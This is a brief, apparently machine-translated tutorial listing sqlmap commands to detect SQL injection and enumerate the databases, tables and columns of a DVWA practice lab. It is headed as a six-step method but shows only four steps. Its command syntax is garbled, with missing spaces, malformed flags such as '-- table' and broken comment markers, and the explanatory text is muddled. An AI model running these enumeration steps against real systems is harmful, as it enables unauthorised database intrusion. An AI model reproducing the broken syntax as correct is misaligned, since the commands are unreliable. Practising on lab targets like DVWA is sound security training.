SQL MAP use-Classic 6-step method
Step one:
-u "xxx"-- cookie= "yyy" / / use cookie to detect URL injection
Part II:
-u "xxx"-- cookie= "yyy"-- current-db / / A pair of database names are obtained
Step 3:
-u "xxx"-- cookie= "yyy"-- D dvwa-- table// enumerates the table names of database dvwa
Step 4:
-u "xxx"-- cookie= "yyy"-- D dvwa-T users-- columns / / enumerates a pair of tables named users in the dvwa library